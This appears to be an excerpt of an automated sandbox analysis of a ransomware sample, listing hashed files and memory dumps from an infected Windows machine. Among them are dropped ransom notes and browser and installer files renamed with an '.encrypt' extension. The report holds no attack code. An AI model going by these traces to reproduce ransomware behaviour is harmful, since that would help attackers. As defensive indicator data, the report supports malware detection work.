| SHA1 | f2a6324886b44ce7afbf1c25dec042685ae3c91a |
| SHA256 | 965a57a82458571c95a084359603a477e04e1aae7308fbbdfa9360647c857250 |
| SHA512 | 53b5d6b0bbd6ca840657f5c505c1ac30246dbba88ae9537feaf9d71760c50f07c874cc82fcd563c848713473a9f0f7a9f03566e013f02128e0446aceca32da9b |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133895706702730727.txt
| MD5 | d00683fb34dd1f20d42c6f52133048a8 |
| SHA1 | eed0ba25b7988f789673600f203cf3e25aea4634 |
| SHA256 | c6a19181777da094758bb94e9d8de7dcb6d731d0a626fe6f021a078265df6c6f |
| SHA512 | 68590417b48a37f3fbeb3303bb880b668dcfb27f91be79d71aa47aad1cf3108bec7fe9ceb497024882063a89eb90d8e1a17d02368a74f03120ab1fd70a99d6fc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 9df7e7b56aaf435389d8fb6e6bfb51b4 |
| SHA1 | 779df2bf57cc7139fd2a55a2e4414d85256283e3 |
| SHA256 | a07312a655c1bc7b7cb9df8df8d3bc033ed494859e02ee1f9f80430d292e2fd3 |
| SHA512 | 822a0fe692f3a2ad04dd430b4427936a83338f747bc9b602007363083af8fbfdd30e41d79a6a2cd7550d862ebfe9b2854b72a10ec414b6f7703750fa0af2342e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 80be741eea57be5f35838c6eb5448f23 |
| SHA1 | 9973dca11e7e5bbbfbdb5aa30b174db3e91b36ed |
| SHA256 | d2beef110e45c24aadcb69551100adc28e8d9b18bc84766fadedec7d7855546f |
| SHA512 | 3de74966670e077eaae9c72f57d7b5546255d48713430690f20d096f82ffeecaaf5a24791502320c0699b34835e96325d292f7b6664dfe513424d224059671ce |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 352dd23643b1b0b270df6463d41a71f9 |
| SHA1 | 03ac093f9b80c6caf3be0d1fe3bfb80d921316ed |
| SHA256 | 75a1a78e4e228dd5646208b2a442def1dae93a0ca2ee25861e4436e2205cf295 |
| SHA512 | cc7c56a63ea202cbc21dff0afca0c1f11ac11c59e552302f4094b7fc3d5a1b7ce72b40af0c30ffcf515cfb20160a6baf7cd92c827cbe16eb28a1ab4a0becee0e |
memory/4200-7115-0x000000000BDC0000-0x000000000BDC1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | d004f43f9b24af5357cdc360715b78da |
| SHA1 | 4b9b92c67ec7724e9f4fd009ef0c73f931cc4654 |
| SHA256 | fd4ac8ada93ec2138c4159957f1ceb7bc29b8a40f97cd0e60538c03abf6e05cf |
| SHA512 | fb92c47e8ad1d7547a2bef54a934806390d62625259b7ccf0d7d679d0ce49122eef2ad4457b6a31089d5dcd0f79d3e03ceb45a7e658ac87b57e1bb87241b58b1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | f0dc5cb8128b4963a9ca7ea2848bed61 |
| SHA1 | 5ea0204c18d2a6116f967b761159937387e9d2ee |
| SHA256 | a4cf85a6d8a4f1a4f439dd9fc91dadd09f2d51a68a3d69cd7ae1e5563d57cbd0 |
| SHA512 | 8f20d19f92e5a14e4bc99ad7c16a0a5c2fed7a2964a61af240f1e8955f9d8b47207706f8a46575e202f550dd4bd7fd98e1f51f6e3948874d2525da91ac64eb4f |
memory/5852-7194-0x0000000000400000-0x00000000004CE000-memory.dmp
memory/5852-7195-0x0000000075390000-0x00000000755CA000-memory.dmp
memory/5852-11101-0x0000000076C70000-0x0000000076E0D000-memory.dmp
memory/5852-13110-0x0000000076E10000-0x0000000076E8D000-memory.dmp
C:\Users\Admin\Videos\HELP_DECRYPT_YOUR_FILES.txt
| MD5 | e44cd015c009e47aab9b1b11e1fc4936 |
| SHA1 | afec3d12392b51918c1c42b5aed1625dae007ac3 |
| SHA256 | 8cfeb845d5738b90bcb227b6298dde6114f1cb0042f7c596f6a3d599a2621b95 |
| SHA512 | 53e40588c2dd6b3d76752496ed74a55d173571e9794ffd88e78c291dcaa39d955e8046d9946478cec92c7ab41e12ea4a8cae589a61219b85986d4723c26e5522 |
C:\Users\Admin\Documents\Restore-My-Files.txt
| MD5 | b023ea7e46ed17e1b9cbad3a5f944db2 |
| SHA1 | 700da850404b343d7873cb1ec60ad5afabcf5469 |
| SHA256 | c148c6f679d12a3b62ad158cf1406f8fa3ad69ba7463095985a7170aca288ec0 |
| SHA512 | 2eca371570a99ff7d6788dd032f9fdff63104ab2dd0469129fc2cf2331e006225c847f0d598c6d52fc5de9f335c4c2e58aaf62e89d337fa17165720153e585e4 |
C:\Users\Admin\Contacts\HELP_DECRYPT_YOUR_FILES.txt
| MD5 | 3cc2d08244a1ead086546c489687293b |
| SHA1 | 125f58a55ab503e5c3a5b356a9ccf7c172594f75 |
| SHA256 | 987d8d5bbd17af1eb51e1b0907b1c823e79a135212a105ff06943d7406ed4561 |
| SHA512 | 4f7f40aa4fae5d29c7c91c798e69b0a49f518d73011eaa5e2c72efc67e32a687cd921c5998f3acace6fdd3de2e4a2470d56ada55e67f24d6d35d4ccad619e3db |
memory/5852-20385-0x0000000000400000-0x00000000004CE000-memory.dmp
memory/5852-20325-0x0000000006590000-0x0000000006B36000-memory.dmp
memory/5852-20324-0x0000000005BF0000-0x0000000005C8C000-memory.dmp
memory/5852-20323-0x0000000000400000-0x00000000004CE000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | be24f3fbf54e8b0bc9b453c5824064ea |
| SHA1 | ac0d13430ff46da8436911866a3bf3a438c8a2aa |
| SHA256 | d0dda3d7fbc525a867d6159c675fa5dec71483d5d8f37a5036687c9dbb3c3bb7 |
| SHA512 | 1f1e47943b601ed725ea61c483e43a65091f53e3ceec704155a18e8ba2620b1abf5640c207e1ba107dbb2227cec95d5d6bd39940e2487413d84afe2d508c8a47 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | f80c027c6d8a7f4036edf458eb40a0fb |
| SHA1 | d1839fc3f9bcdf30c05fa9de2e54864a6ef0c760 |
| SHA256 | e370ef172127e47edea851c3899a3b5f531ff9a6d17a7007f7ea12e896b90f6c |
| SHA512 | 4647998067f3e803d70d18e6207101e354cd4582a138d3e252021c3d5d144516b7b46819e30176d84875f4a50196e56fd29fdc0ad753d3c2f0c8110aafdb1a3c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | cce1bf5d00ac5b883be07fedaad8171d |
| SHA1 | ec2379de11c0a07b43233c7bfa66cc9806c55385 |
| SHA256 | dce7621c71739a4697658050ca3f4c61ac20e0aee0de5dd5ea99c9df887802d5 |
| SHA512 | 234e056daa11b82a6bbbdc4a9ecc8f0f904e03a4b8268364479a2e953745130e7f1511219b9269437c68070c29aae8c02bdd775b0811cd586043a215fdd4bbf1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 74fa4573dcb40ce3e6e14974294afdec |
| SHA1 | c44827078607848896401ab40a8ff1d08c27c811 |
| SHA256 | cdab4112195a44f785d9fb4a85271a6a5fd7c62ec07b5885316583d963c5372c |
| SHA512 | 43d49ed1332ad81a91db072f72dab5a70bb4eca29e101a70939b558625fa025c3f3f58cb3ccdc8f5cbc1384d9185c2446db706705cd656d8f9331961783ae0e4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | 936336d3c2cdb01c335cf15df92065d2 |
| SHA1 | a4fe5e62d5e7648c3566c1647242ecf42e3cf1a7 |
| SHA256 | c3d04412d9fcc9c9b44525b93aef645ba29ab734ebbf030e6f451cf78fb29433 |
| SHA512 | 0c0c74b647d494077ec42a8f3d27d5d60e18575cd2db9c4e5b6c1f6fd5e9725df8fd5757a5decd74365e97709de6a6ba512c690fcf5fbedd5597ac9f8185da22 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | e0e91e14952f0d1547bd9b7b187330d1 |
| SHA1 | 424f08a552899b3dd527647b6b39ab2b9b55d77b |
| SHA256 | 7b119599e7bc6cb3948288e512ecc013801b2c4656ab59ce3f56de452a7f8c99 |
| SHA512 | 17c180a264f43fe59147771f6a86ec96f11334bc64e30065bce274af1593efc0af9ec68979fed41a5b2ffe6bace43544c8322b6658fe3595ee778cc794da9463 |
memory/14420-20610-0x000000001BE90000-0x000000001BED2000-memory.dmp
memory/14420-20613-0x000000001CA20000-0x000000001CAC6000-memory.dmp
memory/14420-20614-0x000000001CFA0000-0x000000001D46E000-memory.dmp
memory/14420-20615-0x000000001D580000-0x000000001D61C000-memory.dmp
memory/14420-20616-0x000000001BE40000-0x000000001BE48000-memory.dmp
memory/14420-20617-0x000000001D7E0000-0x000000001D82C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 8c6b49c21ae083572eaeecb02c0efee6 |
| SHA1 | a8a18d42bcba0875093c35410ebad66d0cf1db16 |
| SHA256 | 8d0d391911f5a947c6134f0637a7706291b81d713f1f572961ff0965734181d4 |
| SHA512 | f1b55e0722b075d6b19144be55b9babcab06b67ece9c6d1fe367c15345bf249676d6023e13679b1bcd5df979bf1028d0329a49888eedd608bc7093f90684b812 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | 34b61dde98276b1a374db59798b4fec7 |
| SHA1 | c8b0ed7a18ccc05494ff07e43362005cd35f4555 |
| SHA256 | 5745a04cb8b6421629678a53fda2972125c6d7cb4cfdf808c971758aee5c195a |
| SHA512 | f40e8120185010a11d5c0fac079f2000b1eb5bc4e565c508486cafa4796fd149fde18481ac59d997e9ab5578a5d92a4635ad2e426b5a1d208ba08a5edac71d57 |
memory/4200-20666-0x0000000002E20000-0x0000000002E21000-memory.dmp
memory/15308-20712-0x0000000000CD0000-0x0000000000CDC000-memory.dmp
memory/15308-20713-0x0000000005630000-0x000000000563A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 13998fcca120b6c5af5c251fdebd3e00 |
| SHA1 | aa0a8d9bb4dba4e285b3178f0fa253636f9fe88d |
| SHA256 | b6fd013b3647341ccb162aec70e73c7c815a88b957a153374f2a73af28d74474 |
| SHA512 | a511d826c8208a364d1e4bff9a558cb70954add92fd104edcb9f8d2e67d8f98aac2b4a5f6a397cd4237c7fa7bde83d837cfad02c40eba45597c632355bfc1db6 |
C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\UpdateLock-308046B0AF4A39CB.encrypt
| MD5 | da5a094000b37a4e04a465c6d6bbc293 |
| SHA1 | b4b879462fc2d90910afe5af37a933324c5f86a9 |
| SHA256 | 4d66bafcea9fe79a33b3d91b6a4236618789539c9d7630b4b118a8e96e198701 |
| SHA512 | 9446492ca0f55a9571794c2792f6dc18dee4857b282d1c0aac7569dbd56455b8d424cc801e2eb9245cfc93b228fad2dfcabc762a532e98f2a695d649b293f7eb |
C:\ProgramData\Package Cache\{7DAD0258-515C-3DD4-8964-BD714199E0F7}v12.0.40660\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.encrypt
| MD5 | 2c77adefdfbe014fb62ad974049e828f |
| SHA1 | e48c2312c4295c844288ea6c402f9386cc51d11a |
| SHA256 | 989e46ef8aff059a4e973b4383e0e41d154247b2b1e25f2633f9633bdebe2d7a |
| SHA512 | 4df2888e33f80049324985b9f04fafd3e3be07cdc57ae77bd1ca33dfb5be3c7c68d2ec3a73139520439360fa59b069a4f2ca4e01e84e07feb2a4615be44434d6 |
C:\ProgramData\Package Cache\{9F51D16B-42E8-4A4A-8228-75045541A2AE}v56.64.8781\dotnet-host-7.0.16-win-x64.msi.encrypt
| MD5 | 56deaccc2392ca238d60ecc3b0d27664 |
| SHA1 | 6a1626d090dd8ca269b709da6610b9a5b8efbaba |
| SHA256 | 9771b44185ded8d4314162961987cf7ad35430e33f1e5e4d4ead580556835b96 |
| SHA512 | a31403259c5969ba05518c1a01c9cc3e0c8356f060912f5e39939789cb7809fd3cc87feea17300f3491244f6ebd151f6c4b0f4d6f8fe45ee3b736b3f2fc4f2d8 |
C:\Users\Admin\AppData\Local\Comms\UnistoreDB\USSres00002.jrs.encrypt
| MD5 | 407d7e7876d5be15bfeaf54f51e8c9cd |
| SHA1 | b0c6a52e8df06e27db7c90c7c1fda5f155c1d337 |
| SHA256 | 03ce645063d5ad0975947b0cbe1ba75ac1801ab8ff59c94ffa3375f82d19d50a |
| SHA512 | 3c37cdd7567aed4f5ba4a1f9b53ef3433c5e0a42e9eb981812d4af8cb56f6d57f6c8a5431dcab9d1dc7b1c73b78f6175855cd000dbe5cab864bf9c19749321db |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\CURRENT.encrypt
| MD5 | f3237bbe4306bedad354bbf5e034422f |
| SHA1 | e741ddd0f9bebc1f0f92156a29588b9ff5bcb22b |
| SHA256 | 197092afe4b83735abe4527dabcdb1611a8e6b3aab6c315192fa7d77aa588471 |
| SHA512 | df68c6780e88874c3ad0f99d4b3b907bec2ffb245079ac56161e3a6448cc4ca772d4a22506544eb6cd53560d9f612089895f2a70e4bfc96ea36e831f7c7b71c1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\MANIFEST-000001.encrypt
| MD5 | f1ac3ec81b83a43c30d0fd9e35244660 |
| SHA1 | c306d03a18837fe7fe77b2a8a8f6b0097f678b6d |
| SHA256 | ab6aba16cdfe80c6bfd3ddca1c1f5bd3ebcae37b281d9334f7a2e972d88347c7 |
| SHA512 | 9be08613a568f133022bf7d1f48fb0db3a2581f82bd6288d210fc2f14088bf2ba105695aa775a2a25650bff5dbeee30122578d5549f555fdba6bd095922af93d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index.encrypt
| MD5 | e9cd4ab7c97ea4c5ebc296eb9055e144 |
| SHA1 | 3ad5a9b9358208b3df0d0a5a3d46cb516d19bdf7 |
| SHA256 | 77c2858bc280859278e5f4b9d9900ecdc401875e7e1e09d444dc603aef758eff |
| SHA512 | 328e77fdb94cbd5a783cc751a05973f01ec87aba08fadc06deba7728f0e5ca3b5d214d6c8304f79a3899126c1a676e4d478691ce9fd408db8206769f2ce72947 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnWebGPUCache\data_0.encrypt
| MD5 | 2c4fbecf0640659ddc7777d9257ebec2 |
| SHA1 | 0c19240e9425f9c5063a764d0cba9b98af746426 |
| SHA256 | 1218414192aa4deead487810dc61ae28faf482b675c75fd59a27dfdca46bd40c |
| SHA512 | 4e20ee85f88f49538ced3c368e93c1e26867c4f22891a1af2b9f6080911e69b8d0bebc77918b16f4c35d4ba310a2ae548bc0c738c44c7ee3659b4706ebe0c4ff |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnWebGPUCache\data_1.encrypt
| MD5 | 10ed2063cf25b63857d7f135e7ee9711 |
| SHA1 | 9b86e518fdd6cf3b6d7903fbce9471a19da9bc84 |
| SHA256 | f72c4b75fbc3f81c4a3b0051e34ffacd011e40c3180b2d5c937adc62669bdd2f |
| SHA512 | 8bc93d2de3cca4532a0360e99bc6877aae6126baedb88aa7cf43b14bb5065fcd276d419d5d779cf839e2819d0d1419d867faffbbc707d971ba6f6763993d88a2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnWebGPUCache\data_2.encrypt
| MD5 | c6be081dec773f94cc72e044da310ad8 |
| SHA1 | ed83425cc57ed4a4d5b4bafbe7f7f71dd4485348 |
| SHA256 | a728b5540892ca6abf4cf0fadf7c1f367881b49cdbbc537263dd5d99e2c66a1c |
| SHA512 | f609f42c4a030533f0e8fe7896413a02ef8ae0575f63c39d2cbee9807a84e4b105116bb9debb6bc2b695cacb1186ad3002243abbd8b10d261c7ed7b2a60e7117 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnWebGPUCache\data_3.encrypt
| MD5 | 0f07325043818b3c8dc717cce36ead70 |
| SHA1 | b8897c8b7467894eda1b693560890aa62ed9fbaf |
| SHA256 | bb2e1fa07ece8650c688f5a1fd5208c94687329b8515776a6403d74e9695598a |
| SHA512 | 706b6d30695fab17c3d6adf314a1e3606b842bbfb67f7a8c1656ed4140086fe8c40c303aa82a014e2ffab1852d515508bacee0c2c5f4952a809d50ef16f00d6a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | a1be40d935c28df4f69953e00c50ae6b |
| SHA1 | d75f548b5b74dd26157f30f048b0f0fc5d8b0ad2 |
| SHA256 | 06958a77ca74aa69d5c6d551912f41734cc47a27012ed51e587b4f5e885ea022 |
| SHA512 | f4abed47d60c633669421bcc1075ed8ffc6a97c416c99e95fc16da696d07dd8f13ffdefb4b2b7516599bdfeff7525b0d3773f371d9698d7e54378cd7582c8a49 |
memory/19832-22584-0x0000000000400000-0x000000000044E000-memory.dmp
memory/4200-22585-0x0000000000D80000-0x0000000000D81000-memory.dmp
memory/4200-22587-0x0000000000D90000-0x0000000000D91000-memory.dmp
memory/4200-22588-0x0000000002A50000-0x0000000002A51000-memory.dmp
memory/4200-22589-0x0000000002D60000-0x0000000002D61000-memory.dmp
memory/4200-22590-0x0000000002E60000-0x0000000002E61000-memory.dmp
memory/4200-22592-0x0000000002E30000-0x0000000002E31000-memory.dmp
memory/4200-22595-0x0000000000DA0000-0x0000000000DA1000-memory.dmp
memory/4200-22598-0x00000000094E0000-0x00000000094E1000-memory.dmp
memory/4200-22599-0x000000000AFE0000-0x000000000AFE1000-memory.dmp
memory/4200-22600-0x000000000AFF0000-0x000000000AFF1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | dce42dc3cf39635e92fb9d1a7d6043bd |
| SHA1 | 623827ff2e96ada51c90fffa42726398ecb2d302 |
| SHA256 | 71f2f591ba4ab3a0aa88f38ad62f6b30b34f4188bd3ce9d6c36d44ea59fa45db |
| SHA512 | ca6a29a22152625d9dbd698fec12f4d46d169486919c611029d2677a6d9e2b1adb3b18878764e2ae43db9be5e89cc51f84e2a032449fa978f0506cca4b0d57c5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RFe64da44.TMP
| MD5 | c2424c8465029cda8030f46f4915ab55 |
| SHA1 | 77d60ce860c347e855219a5dc1ad053e9bfee30c |
| SHA256 | e348e92a90285a30b932fc76314cebaa7f0c550795fd6377a5b74bdfab31f728 |
| SHA512 | 77dd5b5f0a1d98eeb46fc7a928733403673429854afbb271c43d4c052cc75746ecb958e5602b0ebacb4d6c0a1255e34ce20fcab85d87172969a0fe786c98242e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 788b5f014c018d32adc107e78f2594d3 |
| SHA1 | eb60b4464fdf98c3a36a6244271ed4538f3ce37f |
| SHA256 | a04883353eb93c21920f85278ec908db76888b99625d5b02dcad3fc3a3dc0b87 |
| SHA512 | cd8ecb26036e6c24c896195069d4a26658cdc21fd3f2229f74996180b0354b8e88d0c7b3d2eb693e96b8ac30881008354a76809bbe9ce5397e76530da015107c |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_WindowsPowerShell_v1_0_powershell_exe
| MD5 | 94b56d65a8b7f7253aeacac345d4b096 |
| SHA1 | 7e11e248ae804d3647479a4fe5f03835a1eee4bc |
| SHA256 | 0f312587a999305794730da6f2198c82a346e64211e2fb054256102ac70315be |
| SHA512 | 538cc0c1b4dc66e8a3c6ca9a17ddac128441874248589bcc6c88b64ad7d3b93ff143867d6fad0002cbb4584e951d0e82441c350396e6d59b73207a3ffe0fc055 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133895710623192049.txt
| MD5 | e8c695bdb16bb8483342955cc99be60c |
| SHA1 | 1558643614dc903d2fd12197dc96b133e1075a4e |
| SHA256 | 0b666da3983130ddd5d37bca3345b90a5754318f0f722277c36860d7a15ec80a |
| SHA512 | d3e34a77dc44f99a2af27763233eb90fddae49e378fda07db5a0293797a570bcb834b0cf568e7011c3bc9d49e6219b3a0563f3803e0c6923454d204c0fd1c732 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
| MD5 | 9717dc76a8f27142ef21f89bc469c5f7 |
| SHA1 | 4f76a8af1c06c4902cd50b6744f832c716ececa0 |
| SHA256 | a2fedb9a561751b101bd80fca318ea56990dc1d66be77302a2ed9ddb37867174 |
| SHA512 | d8e390d27316d7708e7921cae9e0c32acfd4f04cb46fa23555de5d694ea9de9ebf2b70ef89c822891f4ab00883dd76babc1c5d24b3a2eaa190548f8d4abb4e1e |